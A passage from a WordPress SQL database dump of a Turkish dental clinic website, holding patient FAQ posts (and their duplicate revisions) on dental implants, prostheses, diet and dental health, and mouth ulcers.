rastlanmamıştır.\r\n\r\n<strong>İmplantlar kozmetik amaçlarla kullanılır mı?</strong>\r\nİmplantlar genelde kozmetik nedenlerle kullanılmazlar. İmplantların kullanılmasındaki amaç protez dişlere dayanak vermektir. Protez dişler kullanarak kozmetik düzeltmeler yapılabilir fakat böyle bir tedaiye başlamadan önce beklentilerinizi tamamı ile diş hekiminize danışmalısınız.\r\n\r\n<strong>İmplantların başarısı garantili mi?</strong>\r\nAğzınıza giren ve sizin kontrolünüz altında olan hiç bir şey için garanti vermek mümkün değildir. Doktorların bir organ naklinin veya kalp ameliyatının sizi belli bir süre hayatta tutacağını garantileyemediği gibi biz de size ancak mümkün olduğu kadarı ile implantı kusursuz bir şekilde yerleştirmeye çalışacağımızı söyleyebiliriz. Size implantınızın bakımı hakkında gerekli bilgileri verebilir, gerektiğinde muayene edebiliriz. Biz implantların başarılı olması için elimizden geleni yapacağız, fakat siz de aynı gayreti göstermelisiniz.\r\n\r\n<strong>İmplant yerleştirilmesi ne kadar zaman alıyor?</strong>\r\nBu süre, durumunuz, ihtiyaçlarınız ve yapılacak işlere bağlıdır. Bir tek ameliyat yarım saat ile bir kaç saat arası sürebilir. Bütün bir tedavi bir ameliyatla da bitebilir, bir dizi ameliyat ve randevu da gerektirebilir. İyileşmenin tam olması aylar alabilir.[/vc_column_text][/vc_column][/vc_row]', 'İmplant ve Protezler', '', 'publish', 'closed', 'closed', '', 'implant-ve-protezler', '', '', '2018-07-13 13:24:54', '2018-07-13 10:24:54', '', 0, 'http://www.ze-dent.com/?p=6257', 0, 'post', '', 0),
(6258, 1, '2018-07-13 13:24:47', '2018-07-13 10:24:47', '', 'implant', '', 'inherit', 'closed', 'closed', '', 'implant', '', '', '2018-07-13 13:24:47', '2018-07-13 10:24:47', '', 6257, 'http://www.ze-dent.com/wp-content/uploads/2018/07/implant.jpg', 0, 'attachment', 'image/jpeg', 0),
(6259, 1, '2018-07-13 13:24:54', '2018-07-13 10:24:54', '[vc_row][vc_column][vc_column_text]<strong>İmplant (diş ekme) nedir?</strong>\r\nKısaca implant, eksik olan dişlerin fonksiyon ve estetiğini tekrar sağlamak amacıyla çene kemiğine yerleştirilen ve uygun malzemeden yapılan yapay diş kökleridir.\r\n\r\n<strong>İmplant çeşitleri</strong>\r\nDeğişik implant tipleri üretilmiştir. Ancak günümüzde en popüler olan implant tipi ‘vida’ şekilli olanlardır.\r\n\r\n<strong>İmplantlar ile tedavi güvenli ve uzun ömürlü müdür?</strong>\r\nİlk diş implantları mısırlılar zamanında safir kullanılarak yapılmıştır. Güvenli bir implant ortaya çıkarmak için yapılan çalışmalar 1809’dan beri sürmektedir.\r\n\r\n<strong>İmplantlar her olayda kullanılabilir mi?</strong>\r\nİster tek diş, isterse birden fazla diş eksikliğinde eğer implant yerleştirmeye uygun miktarda kemik varsa, her olay için implant kullanılabilir.\r\n\r\n<strong>Her hastaya implant uygulanabilir mi?</strong>\r\nİmplant vidaları belirli kalınlığı ve genişliği olan yapılardır. Bu nedenle implant konulması öngörülen bölgede, çene kemiğinin, bu implant vidasını kabul edecek yükseklik ve genişliğe sahip olması gerekmektedir. Var olan kemiğin kalitesi de implant başarısını etkileyen faktörlerden birisidir. Ayrıca tedaviden önce ve implant ağızda kaldığı sürece dişetlerinin tamamen sağlıklı olması gerekmektedir. Hastanın genel sağlık durumu iyi olduğu sürece implant uygulamasını engelleyecek bir üst yaş limiti yoktur ancak kemik gelişimi tamamlanmamış çok genç hastalara uygulanması tercih edilmeyebilir.\r\n\r\n<strong>İmplant yerleştirilirken acı duyar mıyım?</strong>\r\nUygun anestezi yöntemlerinin uygulanması durumunda hayır. Operasyon sırasında hasta tercihine göre genel ya da lokal anestezi kullanılabilir. Genellikle implant’ın yerleştirildiği akşam duyulabilecek ağrı basit ağrı kesiciler ile giderilebilir. Birçok hasta bu ağrının normal diş çekiminden sonra duyulan ağrıdan farklı olmadığını belirtmektedir. Tedavinin problemsiz tamamlandığı vaka’lar da implantların varlığını bile hissetmeyecek kadar rahat olursunuz.\r\n\r\n<strong>Toplam tedavi süresi ne kadardır?</strong>\r\nİlk muayeneden, işiniz bitinceye kadar genellikle 5–6 ayrı randevuya gelmeniz gerekecektir. Bu randevuların süresi, yapılacak işin özelliklerine göre farklı uzunluklarda olacaktır. Tedavi alt çene için 3 – 5 ay gibi bir sürede bitirilebilirken üst çene için 6 ay kadar sürebilmektedir.\r\n\r\n<strong>İmplantların temizliği önemli midir?</strong>\r\nEvet. Hem de çok önemlidir. İmplantların ağız içindeki yabancı cisimler olduğu düşünülürse temizliklerinin en az kendi dişleriniz kadar hatta daha da önemli olduğunu takdir edersiniz. İmplantların temizlikleri belli bir öğrenme süreci gerektirse de, zor değildir. Ancak bu iş için yeterli zamanı ayırmanız gerekmektedir. Unutmamanız gereken şey, bu tip bir tedavinin başarılı olması için gerekli en önemli faktörün düzenli ağız bakımı olduğudur.\r\n\r\n<strong>İmplantlar üstüne yapılacak protezler nasıldır?</strong>\r\nİmplantlar üzerine yapılacak protezler vaka’nın özelliğine göre değişik tipte olabilir. Yani bunlar kolayca temizlenmesi amacı ile hasta tarafından çıkartılabilecek şekilde olabileceği gibi ancak diş hekimi tarafından çıkartılabilecek şekilde de planlanabilir. Her iki planlamanın da avantaj ve dezavantajları bulunmaktadır ve sizin için uygun olan tasarımı hekiminiz tedaviniz başlamadan önce size anlatacaktır.\r\n\r\n<strong>Eksik her diş için ´bir´ implant gerekir mi?</strong>\r\nHayır. Eğer eksik diş sayısı ‘1’den fazla ise implant uygulanacak bölgeye bağlı olarak tek bir implant 2 ya da 3 diş yerine hizmet verebilir.\r\n\r\n<strong>İmplant vidası kemik ile kaynaşmaz ise (osseointegre olmaz ise) ne olur?</strong>\r\nDoğru implant ve yöntem kullanılması durumunda böyle bir olasılık yok denecek kadar azdır. Bu tip bir başarısızlık genellikle cerrahi operasyonu takip eden ilk 6 ay içinde ortaya çıkar. Böyle bir durumda diş çekimi kadar kolay bir işlem ile implant yerinden çıkartılmalıdır. Bu bölgedeki kemiğin iyileşmesini takiben yeni bir implant konulabileceği gibi, klasik tip protezlerden birisi de tercih edilebilir. Ancak, genellikle, 2’den fazla implant konulan vaka’lar da arta kalan implantlar protezin de yeniden tasarlanması ile hizmet vermeye yeterli olmaktadır.\r\n\r\n<strong>İmplant tedavisi pahalı mıdır?</strong>\r\nMaalesef, evet. Kullanılan tüm malzemenin ithal olması ve sağlıklı implant üretimi için çok yüksek teknolojiye gereksinim duyulması tedavinin fiyatını belirlemektedir. Ülkemizin içinde bulunduğu ekonomik şartlar nedeniyle döviz kurlarında gözlenen artışlar da tedavinin maliyetini olumsuz etkilemektedir. Ancak kesin fiyat uzman hekimlerimizin sizi muayene edip, bu tedavi sekli için uygun bir hasta olup olmadığınızı belirlemeleri ve istediğiniz protez şekline göre değişecektir. İmplant yerleştirme işleminin karmaşıklığı ve uzunluğu, hastanın diş sağlığı ve ihtiyaçlarına bağlı olarak değişir ve sonuç büyük bir yatırım olabilir. Buna rağmen 350 hastaya implant yerleştirildikten sonra yapılan bir ankette, hastaların yaptıkları yatırımdan memnun kaldıkları ve gerekirse tekrar memnuniyetle yapacakları bulunmuştur.\r\n\r\n<strong>İmplant tedavisi nerede ve nasıl elde edilebilir?</strong>\r\nBu tip bir tedaviye başlamadan önce yeterli ve doğru bilgi almanız, her şeyden önce, kendi sağlığınız açısından gereklidir. Bu konuda, implant cerrahisi eğitimi almış diş hekimleri size gereken tüm rehberliği verebilecek bilgi birikimine sahiptir. Bunun dışında diş hekimliği fakülteleri de doğru bilgilendirilebileceğiniz kuruluşlardır. İmplant tedavisi, doğru seçilen vaka’larda ve usulüne uygun yapıldığı takdirde, hastaların yaşam kalitesini arttıran ve yüz güldüren bir tedavi yöntemidir. Bu denli başarılı bir tedavi yönteminden tüm dünya da olduğu gibi ülkemizdeki hastaların da yararlanması gerektiğine inandığımız için, implant tedavisi hakkında bilgi edinmek için yaptığınız başvurulardan herhangi bir ücret talep edilmeyecektir. Bu muayene sırasında tedaviye uygun bir hasta olup olmadığınızın ortaya çıkması için implantları yerleştirecek, üzerinin protezini yapacak ve daha sonraki periyodik dişeti bakımını üstlenecek uzman hekimlerin sizi muayene etmesi en doğru yöntemdir. Bu muayene sırasında sizden genel sağlık durumunuz hakkında bilgi alınacak ve gerekli görülürse birtakım tahlilleri yaptırmanız istenebilecektir. Bu asama da ayrıca çeşitli röntgen incelemeleri ve ağzınızın modellerinin elde edilmesi gerekebilecektir.\r\n\r\n<strong>İmplant tedavisinde gözlenebilecek riskler nelerdir?</strong>\r\nAğız içi ya da dışı tüm cerrahi işlemlerde gözlenebilecek risklerin ötesinde bir risk söz konusu değildir. Bunlar erken dönemde enfeksiyon ve alerji, protezlerin tamamlanmasından sonra ki geç dönemde ise yetersiz ağız temizliğine bağlı iltihaplanmalar şeklinde ortaya çıkabilir. Özellikle erken dönem iyileşmesi sırasında sigara kullanmak enfeksiyon riskini arttırmaktadır.\r\n\r\n<strong>İmplant tedavisi hangi vaka’larda ne avantajlar sunar?</strong>\r\n<ol>\r\n 	<li><strong>Alt çenede tamamen dişlerini kaybedip protez taşıyan hastalar:</strong> Bu hastalar protezin hareketine bağlı olarak sürekli ağrıdan (vuruk) ve iyi çiğneyememekten şikayetçidirler. Bu şikâyet zaman içinde proteze destek olan kemik dokunun erimesi ile daha da artar hale gelir. Bu tip hastalarda implant tedavisi yukarıdaki tüm şikâyetleri ortadan kaldırdığı gibi kemiğin erimesini de durdurmaktadır.</li>\r\n 	<li><strong>Üst çenede tamamen dişlerini kaybedip protez taşıyan hastalar:</strong> Üst protezler alt çene protezlerine oranla daha stabil olsalar da protezin damağı kapatan tasarımı tat alma duygusunu azaltıp mide bulantısına neden olabilmektedir.</li>\r\n 	<li><strong>Alt ya da üst çenede dişlerinin bir kısmını kaybetmiş hastalar:</strong> Bu hastaların şikâyeti kancalarla tutunan protezin çirkin görüntüsü, ya da köprü yapılabilmesi için sağlam dişlerini kestirme zorunluluğu olarak sayılabilir.</li>\r\n 	<li><strong>Tek dişini kaybetmiş hastalar:</strong> Bu hastalar tek bir dişin restorasyonu için en az komşu iki dişi feda etmek zorunda olan hastalardır. Tek bir implant’ın yerleştirilmesi komşu dişleri kurtardığı gibi daha estetik ve fonksiyonel sonuçların ortaya çıkmasına da neden olur.</li>\r\n</ol>\r\n<strong>İmplant tedavisinin dezavantajları nelerdir?</strong>\r\n<ul>\r\n 	<li>Yüksek fiyat</li>\r\n 	<li>Çok özenli ve zaman ayrılarak yapılması gereken ağız temizliği işlemi</li>\r\n</ul>\r\n<strong>İmplant tedavisinin avantajları nelerdir?</strong>\r\n<ul>\r\n 	<li>Daha iyi çiğneyebilme – Her istediğini yiyebilme</li>\r\n 	<li>Daha iyi estetik görünüm</li>\r\n 	<li>Özgüvenin geri kazanılması ile daha mutlu bir sosyal hayat</li>\r\n 	<li>Her şeyi yiyebilmeye bağlı olarak daha sağlıklı ve dengeli beslenme</li>\r\n</ul>\r\n<strong>İmplant muayenesinde neler yapılacak?</strong>\r\nBu muayene sırasında tedaviye uygun bir hasta olup olmadığınızın ortaya çıkması için implantları yerleştirecek, üzerinin protezini yapacak ve daha sonraki periyodik dişeti bakımını üstlenecek uzman hekimlerin sizi muayene etmesi en doğru yöntemdir. Bu muayene sırasında sizden genel sağlık durumunuz hakkında bilgi alınacak ve gerekli görülürse birtakım tahlilleri yaptırmanız istenebilecektir. Bu aşama da ayrıca çeşitli röntgen incelemeleri ve ağzınızın modellerinin elde edilmesi gerekebilecektir.\r\n\r\n<strong>Bütün implantlar başarılı mı?</strong>\r\nİmplant yerleştirme kararına varırken göz önünde bulundurulması gereken birçok faktör vardır. Öncelikle hasta sağlıklı olmalı, hastanın iyileşme gücü olmalıdır. Örneğin hasta, kontrol edilmeyen şeker hastası ise yarı-iyileşme komplikasyon yaratabilir. Bu hastalık implantların yerleştirilmesi tamamlandıktan sonra gelişirse de implantların gelecekteki durumlarında komplikasyonlara yol açabilir. Ayrıca hasta muayene edilmeli, hastaya uygun implant ve implantı yerleştirme yöntemi özenle seçilmelidir. İmplantlar diş hekimi tarafından özenle yerleştirilip bakılmasının yanı sıra hastadan da özel ilgi görmelidir. Diş hekimi veya hasta implantlara iyi bakamazsa komplikasyonlar ortaya çıkabilir. Bunların yanı sıra sigara\r\niçen ve fazla alkol kullanan hastalarda implantların başarısı etkilenmektedir.\r\n\r\n<strong>İmplantların ömrü ne kadar?</strong>\r\nİmplantların ağızda otuz yıl kadar sorunsuz kaldığı görülmüştür. Fakat implantlardan ortalama beklenti bundan kısadır. İmplantın ömrü birçok etkene bağlıdır. Hastanın sağlığı ve implantların iyi bakımı bunların ikisidir. Sonuçta implantlar bir ömür boyu kullanılabilirler. Ömürlerini etkileyen birçok etkeni ve sizin risklerinizi diş hekiminiz size açıklayacaktır.\r\n\r\n<strong>İmplant yapma kararında yaşlılık etken faktör mü?</strong>\r\nHayır. Sağlık yaştan çok daha önemli bir faktördür. 70-80’lerindeki birçok hastanın cerrahi riskleri daha genç fakat sağlık sorunu olan hastalardan daha azdır. Ayrıca daha yaşlı kişilerin implanta ihtiyacı gençlerin ihtiyaçlarından daha olasıdır çünkü yaşlılarda daha çok diş kaybı olmuştur.\r\n\r\n<strong>İmplantların vücut tarafından reddedilme riski var mı?</strong>\r\nİmplantlar organizma için herhangi bir yan etkisi olmayan maddelerden yapılmış ve yıllardır yoğun araştırmalara tabi tutulmuştur. Bu maddeler genellikle titanyum gibi metaller ve hiç bir zaman canlı bir organizmanın parçası olmayan benzeri diğer maddelerdir. Vücudun bunlara karşı antijen üretip kalp ve böbrek transplantlarında olduğu gibi reddetmesi mümkün değildir.\r\n\r\n<strong>Kanser riski var mı?</strong>\r\nTıbbi literatürde implantların kansere neden olduğunu gösteren hiç bir bulguya rastlanmamıştır.\r\n\r\n<strong>İmplantlar kozmetik amaçlarla kullanılır mı?</strong>\r\nİmplantlar genelde kozmetik nedenlerle kullanılmazlar. İmplantların kullanılmasındaki amaç protez dişlere dayanak vermektir. Protez dişler kullanarak kozmetik düzeltmeler yapılabilir fakat böyle bir tedaiye başlamadan önce beklentilerinizi tamamı ile diş hekiminize danışmalısınız.\r\n\r\n<strong>İmplantların başarısı garantili mi?</strong>\r\nAğzınıza giren ve sizin kontrolünüz altında olan hiç bir şey için garanti vermek mümkün değildir. Doktorların bir organ naklinin veya kalp ameliyatının sizi belli bir süre hayatta tutacağını garantileyemediği gibi biz de size ancak mümkün olduğu kadarı ile implantı kusursuz bir şekilde yerleştirmeye çalışacağımızı söyleyebiliriz. Size implantınızın bakımı hakkında gerekli bilgileri verebilir, gerektiğinde muayene edebiliriz. Biz implantların başarılı olması için elimizden geleni yapacağız, fakat siz de aynı gayreti göstermelisiniz.\r\n\r\n<strong>İmplant yerleştirilmesi ne kadar zaman alıyor?</strong>\r\nBu süre, durumunuz, ihtiyaçlarınız ve yapılacak işlere bağlıdır. Bir tek ameliyat yarım saat ile bir kaç saat arası sürebilir. Bütün bir tedavi bir ameliyatla da bitebilir, bir dizi ameliyat ve randevu da gerektirebilir. İyileşmenin tam olması aylar alabilir.[/vc_column_text][/vc_column][/vc_row]', 'İmplant ve Protezler', '', 'inherit', 'closed', 'closed', '', '6257-revision-v1', '', '', '2018-07-13 13:24:54', '2018-07-13 10:24:54', '', 6257, 'http://www.ze-dent.com/6257-revision-v1/', 0, 'revision', '', 0),
(6260, 1, '2018-07-13 13:28:53', '2018-07-13 10:28:53', '[vc_row][vc_column][vc_column_text]<strong>Neden protez yaptırmalıyım?</strong>\r\n\r\nYıllar boyunca insanların yemek yeme, çiğneme, yutkunma ve geceleri bazı nedenlerle diş gıcırdatmaları sonucunda, dişleri farklı oranlarda aşınırlar. Ayrıca çürükler ve kazalar sonucunda da dişlerin bazı bölümlerinde kırılmalar ve kayıplar oluşur. Bir dişin kaybı sağlığınıza birçok şekilde zarar verebilir. Kaybedilen dişin önündeki ve arkasındaki dişler bu boşluğa doğru eğilirler. Karşıt diş de çekim boşluğuna doğru uzar. Çünkü dişler temas etme eğilimindedir. Bu uzama ve eğilmeler sonucunda dişlerin dizilimi ve birbirleriyle kontakları bozulur. Bu da dişler arasında gıda artığı ve bakteri plağı birikimini artırır. Bu bölgelerin temizlenmesi zordur, bu nedenle diş çürüğü ve diş eti hastalıklarının oluşması riski artar. Tüm bu sorunlar kaybedilen diş yapısının yerine konmasıyla önlenebilir.\r\n\r\n\"Kron\" adı verilen protezler ile dişlerin kaybolan yapıları yeniden oluşturulur. Bu kronlar porselen, akril ya da dişhekimliği için özel olarak üretilmiş olan metal alaşımları kullanılarak yapılır. Diş hekimliğinde son dönemdeki gelişmeler bu yapıların son derece doğal görünmesini sağlayabilmektedir. Kırılmış, renk değiştirmiş ya da şekil bozukluğuna sahip dişler insanların estetiğinde son derece olumsuz bir etki yaratırlar. Bu nedenle psikolojik olarak zarar gören insanlar yapılacak çeşitli protezler yardımıyla kurtulabilirler.\r\nDişlerin kaybedilmesi sonucunda yapılan protezler genel anlamda iki türlüdür:\r\n<ul>\r\n 	<li>Ağızda kalan dişlerin üzerine yapılan ve hasta tarafından çıkartılamayan kron, köprü gibi SABİT PROTEZLER</li>\r\n 	<li>Hasta tarafından istenildiği zaman takılıp çıkartılabilen HAREKETLİ PROTEZLER</li>\r\n</ul>\r\n(Ayrıntılı bilgi için Hizmetlerimiz modülünden Protez Tedavisi bölümü incelenebilir.)\r\n\r\n<strong>Protez temizliği nasıl yapılmalıdır?</strong>\r\n\r\nSabit protezler yani kaplamaların bakımı, sağlıklı dişlerin bakımıyla aynı şekilde yapılmalıdır. İyi yapılmış bir kaplama, fonksiyon açısından ve temizlenme açısından sağlıklı bir dişten farksız olmalıdır. Rutin bakım işlemleri yanı sıra boşluğa konulan parçanın alt kısmının özel Köprü Altı Diş İpi diş hekiminizin göstereceği şekilde temizlenmesi uygun olur.\r\n\r\nHareketli protezler ise her yemekten sonra çıkarılıp fırçalanmalıdır. Günde bir kere özel temizleyici maddelerle temizlenmelidir. Bazı maddeler metal içeren protezlere zarar verebileceğinden hekime danışılmadan kullanılmamalıdır. Kullanmadığınız zamanlarda protezinizi temiz bir suyun içinde tutarak su kaybedip bozulmasına engel olabilirsiniz. Hareketli protezinizi 3 yılda bir kontrol ettirip gerekiyorsa değiştirmeniz gerekmektedir. Zamanla protez aşınıp, kırılabilir veya çene ile uyumunu kaybedebilir. Bu da çene kemiğine zarar verebilir.[/vc_column_text][/vc_column][/vc_row]', 'Protez', '', 'publish', 'closed', 'closed', '', 'protez', '', '', '2018-07-13 13:28:53', '2018-07-13 10:28:53', '', 0, 'http://www.ze-dent.com/?p=6260', 0, 'post', '', 0),
(6261, 1, '2018-07-13 13:28:46', '2018-07-13 10:28:46', '', 'protez-dis', '', 'inherit', 'closed', 'closed', '', 'protez-dis', '', '', '2018-07-13 13:28:46', '2018-07-13 10:28:46', '', 6260, 'http://www.ze-dent.com/wp-content/uploads/2018/07/protez-dis.jpg', 0, 'attachment', 'image/jpeg', 0),
(6262, 1, '2018-07-13 13:28:53', '2018-07-13 10:28:53', '[vc_row][vc_column][vc_column_text]<strong>Neden protez yaptırmalıyım?</strong>\r\n\r\nYıllar boyunca insanların yemek yeme, çiğneme, yutkunma ve geceleri bazı nedenlerle diş gıcırdatmaları sonucunda, dişleri farklı oranlarda aşınırlar. Ayrıca çürükler ve kazalar sonucunda da dişlerin bazı bölümlerinde kırılmalar ve kayıplar oluşur. Bir dişin kaybı sağlığınıza birçok şekilde zarar verebilir. Kaybedilen dişin önündeki ve arkasındaki dişler bu boşluğa doğru eğilirler. Karşıt diş de çekim boşluğuna doğru uzar. Çünkü dişler temas etme eğilimindedir. Bu uzama ve eğilmeler sonucunda dişlerin dizilimi ve birbirleriyle kontakları bozulur. Bu da dişler arasında gıda artığı ve bakteri plağı birikimini artırır. Bu bölgelerin temizlenmesi zordur, bu nedenle diş çürüğü ve diş eti hastalıklarının oluşması riski artar. Tüm bu sorunlar kaybedilen diş yapısının yerine konmasıyla önlenebilir.\r\n\r\n\"Kron\" adı verilen protezler ile dişlerin kaybolan yapıları yeniden oluşturulur. Bu kronlar porselen, akril ya da dişhekimliği için özel olarak üretilmiş olan metal alaşımları kullanılarak yapılır. Diş hekimliğinde son dönemdeki gelişmeler bu yapıların son derece doğal görünmesini sağlayabilmektedir. Kırılmış, renk değiştirmiş ya da şekil bozukluğuna sahip dişler insanların estetiğinde son derece olumsuz bir etki yaratırlar. Bu nedenle psikolojik olarak zarar gören insanlar yapılacak çeşitli protezler yardımıyla kurtulabilirler.\r\nDişlerin kaybedilmesi sonucunda yapılan protezler genel anlamda iki türlüdür:\r\n<ul>\r\n 	<li>Ağızda kalan dişlerin üzerine yapılan ve hasta tarafından çıkartılamayan kron, köprü gibi SABİT PROTEZLER</li>\r\n 	<li>Hasta tarafından istenildiği zaman takılıp çıkartılabilen HAREKETLİ PROTEZLER</li>\r\n</ul>\r\n(Ayrıntılı bilgi için Hizmetlerimiz modülünden Protez Tedavisi bölümü incelenebilir.)\r\n\r\n<strong>Protez temizliği nasıl yapılmalıdır?</strong>\r\n\r\nSabit protezler yani kaplamaların bakımı, sağlıklı dişlerin bakımıyla aynı şekilde yapılmalıdır. İyi yapılmış bir kaplama, fonksiyon açısından ve temizlenme açısından sağlıklı bir dişten farksız olmalıdır. Rutin bakım işlemleri yanı sıra boşluğa konulan parçanın alt kısmının özel Köprü Altı Diş İpi diş hekiminizin göstereceği şekilde temizlenmesi uygun olur.\r\n\r\nHareketli protezler ise her yemekten sonra çıkarılıp fırçalanmalıdır. Günde bir kere özel temizleyici maddelerle temizlenmelidir. Bazı maddeler metal içeren protezlere zarar verebileceğinden hekime danışılmadan kullanılmamalıdır. Kullanmadığınız zamanlarda protezinizi temiz bir suyun içinde tutarak su kaybedip bozulmasına engel olabilirsiniz. Hareketli protezinizi 3 yılda bir kontrol ettirip gerekiyorsa değiştirmeniz gerekmektedir. Zamanla protez aşınıp, kırılabilir veya çene ile uyumunu kaybedebilir. Bu da çene kemiğine zarar verebilir.[/vc_column_text][/vc_column][/vc_row]', 'Protez', '', 'inherit', 'closed', 'closed', '', '6260-revision-v1', '', '', '2018-07-13 13:28:53', '2018-07-13 10:28:53', '', 6260, 'http://www.ze-dent.com/6260-revision-v1/', 0, 'revision', '', 0),
(6263, 1, '2018-07-13 13:32:13', '2018-07-13 10:32:13', '[vc_row][vc_column][vc_column_text]<strong>Diş sağlığımız için nasıl beslenmeliyiz?</strong>\r\n\r\nDiş sağlığı için zararlı olarak nitelendirilen gıda maddeleri; şekerli ve asitli gıdalar ile dişler üzerine yapışıp kalan, kolay temizlenemeyen maddelerdir. Bunları tamamen kesmek değil ancak belirli bir düzen içinde tüketmek diş çürüğünün önlenmesi için gereklidir.\r\n\r\nDiş sağlığı için önerilen beslenme şekli şöyledir;\r\n<ul>\r\n 	<li>Şekerli, yapışkan ya da asitli gıdalar üç ana öğün içinde tüketilmelidir.</li>\r\n 	<li>Öğün aralarında elma, havuç gibi sert ve dişleri temizleterek diş etine masaj yapacak gıdalar yenmelidir.</li>\r\n 	<li>Şekerli, yapışkan gıda yendikten sonra dişlerin fırçalanması mümkün değilse ağız su ile çalkalanmalı ya da bir bardak su içilmelidir.</li>\r\n 	<li>Yine şekerli gıda yendikten sonra ağza atılacak bir parça peynir, şekerin çürük oluşturucu etkisini gidermek açısından son derece önemlidir.</li>\r\n</ul>\r\n<strong>Diş çürükleri eskiye oranla arttı mı?</strong>\r\n\r\nBizim gibi gelişmekte olan ülkelerde diş çürüğüne eskiye oranla daha sık rastlanıyor. Bunun nedeni beslenme alışkanlıklarının değişmesidir. Eski insanlar sert gıdalarla beslendikleri için doğal yollarla dişlerde bir temizlik sağlanırdı. Günümüzde hazır gıda endüstrisinin gelişmesiyle birlikte bu tür gıdaların tüketimi de arttı. Bisküvi, şeker, çikolata, kola gibi her an elimizin altında olan bu gıda maddeleri, dişlerin üzerine yapışıp kalan ve asit oluşturan maddeler oldukları için günümüzde diş çürüğü artışının başlıca sorumluları olarak kabul ediliyorlar.\r\n\r\n<strong>Diş dostu gıda maddeleri hangileridir?</strong>\r\n\r\nDiş dostu olarak kabul edilen kabul edilen gıda maddelerinin başında proteinler gelir. Vücudumuzun temel yapı taşını oluşturan bu maddeler hem dişlerin gelişimi sırasında, hem de dişler sürdükten sonra diş sağlığı açısından da mutlaka tüketilmesi gereken gıda maddeleridir. Yüksek protein içeriğinin yanı sıra diş sağlığındaki önemi açısından peynir özellikle şekerli gıda tüketimi sonrası şiddetle tavsiye edilen bir besindir. Yer fıstığı da içeriğindeki fosfat nedeniyle çerez türü yiyecekler arasında diş dostu olarak nitelendirilen bir besindir. Ayrıca rafine edilmemiş hububat (beyaz undan yapılmış ekmek yerine kepekli esmer ekmek) diş sağlığı açısından tercih edilmelidir.[/vc_column_text][/vc_column][/vc_row]', 'Diş Sağlığı ve Beslenme İlişkisi', '', 'publish', 'closed', 'closed', '', 'dis-sagligi-ve-beslenme-iliskisi', '', '', '2018-07-13 13:32:13', '2018-07-13 10:32:13', '', 0, 'http://www.ze-dent.com/?p=6263', 0, 'post', '', 0),
(6264, 1, '2018-07-13 13:32:04', '2018-07-13 10:32:04', '', 'dis-saglibi-beslenme', '', 'inherit', 'closed', 'closed', '', 'dis-saglibi-beslenme', '', '', '2018-07-13 13:32:04', '2018-07-13 10:32:04', '', 6263, 'http://www.ze-dent.com/wp-content/uploads/2018/07/dis-saglibi-beslenme.jpg', 0, 'attachment', 'image/jpeg', 0),
(6265, 1, '2018-07-13 13:32:13', '2018-07-13 10:32:13', '[vc_row][vc_column][vc_column_text]<strong>Diş sağlığımız için nasıl beslenmeliyiz?</strong>\r\n\r\nDiş sağlığı için zararlı olarak nitelendirilen gıda maddeleri; şekerli ve asitli gıdalar ile dişler üzerine yapışıp kalan, kolay temizlenemeyen maddelerdir. Bunları tamamen kesmek değil ancak belirli bir düzen içinde tüketmek diş çürüğünün önlenmesi için gereklidir.\r\n\r\nDiş sağlığı için önerilen beslenme şekli şöyledir;\r\n<ul>\r\n 	<li>Şekerli, yapışkan ya da asitli gıdalar üç ana öğün içinde tüketilmelidir.</li>\r\n 	<li>Öğün aralarında elma, havuç gibi sert ve dişleri temizleterek diş etine masaj yapacak gıdalar yenmelidir.</li>\r\n 	<li>Şekerli, yapışkan gıda yendikten sonra dişlerin fırçalanması mümkün değilse ağız su ile çalkalanmalı ya da bir bardak su içilmelidir.</li>\r\n 	<li>Yine şekerli gıda yendikten sonra ağza atılacak bir parça peynir, şekerin çürük oluşturucu etkisini gidermek açısından son derece önemlidir.</li>\r\n</ul>\r\n<strong>Diş çürükleri eskiye oranla arttı mı?</strong>\r\n\r\nBizim gibi gelişmekte olan ülkelerde diş çürüğüne eskiye oranla daha sık rastlanıyor. Bunun nedeni beslenme alışkanlıklarının değişmesidir. Eski insanlar sert gıdalarla beslendikleri için doğal yollarla dişlerde bir temizlik sağlanırdı. Günümüzde hazır gıda endüstrisinin gelişmesiyle birlikte bu tür gıdaların tüketimi de arttı. Bisküvi, şeker, çikolata, kola gibi her an elimizin altında olan bu gıda maddeleri, dişlerin üzerine yapışıp kalan ve asit oluşturan maddeler oldukları için günümüzde diş çürüğü artışının başlıca sorumluları olarak kabul ediliyorlar.\r\n\r\n<strong>Diş dostu gıda maddeleri hangileridir?</strong>\r\n\r\nDiş dostu olarak kabul edilen kabul edilen gıda maddelerinin başında proteinler gelir. Vücudumuzun temel yapı taşını oluşturan bu maddeler hem dişlerin gelişimi sırasında, hem de dişler sürdükten sonra diş sağlığı açısından da mutlaka tüketilmesi gereken gıda maddeleridir. Yüksek protein içeriğinin yanı sıra diş sağlığındaki önemi açısından peynir özellikle şekerli gıda tüketimi sonrası şiddetle tavsiye edilen bir besindir. Yer fıstığı da içeriğindeki fosfat nedeniyle çerez türü yiyecekler arasında diş dostu olarak nitelendirilen bir besindir. Ayrıca rafine edilmemiş hububat (beyaz undan yapılmış ekmek yerine kepekli esmer ekmek) diş sağlığı açısından tercih edilmelidir.[/vc_column_text][/vc_column][/vc_row]', 'Diş Sağlığı ve Beslenme İlişkisi', '', 'inherit', 'closed', 'closed', '', '6263-revision-v1', '', '', '2018-07-13 13:32:13', '2018-07-13 10:32:13', '', 6263, 'http://www.ze-dent.com/6263-revision-v1/', 0, 'revision', '', 0),
(6266, 1, '2018-07-13 13:35:46', '2018-07-13 10:35:46', '[vc_row][vc_column][vc_column_text]<strong>Aft neden oluşur?</strong>\r\n\r\nGenellikle ağız içinde dil, yanak içleri, diş etleri ve damakta, zaman zamansa dudaklarda görülen aftın oluşma nedeninin belirlenmesi için çeşitli araştırmalar yapılsa da bugüne kadar kesin bir neden ortaya konulamamıştır.\r\n\r\nAncak tespit edilen bazı nedenleri sıralamak gerekirse;\r\n<ul>\r\n 	<li>Sistemik rahatsızlıklar (Behçet hastalığı, Chron hastalığı vb.),</li>\r\n 	<li>Vitamin ve mineral eksiklikleri (B vitamini, çinko vb.),</li>\r\n 	<li>Psikolojik sebepler (stres vb.),</li>\r\n 	<li>Bayanlarda regl öncesi dönem,</li>\r\n 	<li>Ağız için travmalar (ısırma, çarpma vb.),</li>\r\n 	<li>Ağız içi operasyonlar,</li>\r\n 	<li>Bazı gıda maddeleri (tuzlu, asitli, baharatlı),</li>\r\n 	<li>Alerjik reaksiyonlar,</li>\r\n 	<li>Sigara…</li>\r\n</ul>\r\n<strong>Aft oluştuğu durumlarda ne yapmak gerekir?</strong>\r\n\r\nAft’lar yaklaşık bir hafta sürer ve bu dönemde bölgesel ağrılara neden olabilirler. Beslenme yoluyla ağza giren besinlerse bu ağrının artmasına sebep olurlar. 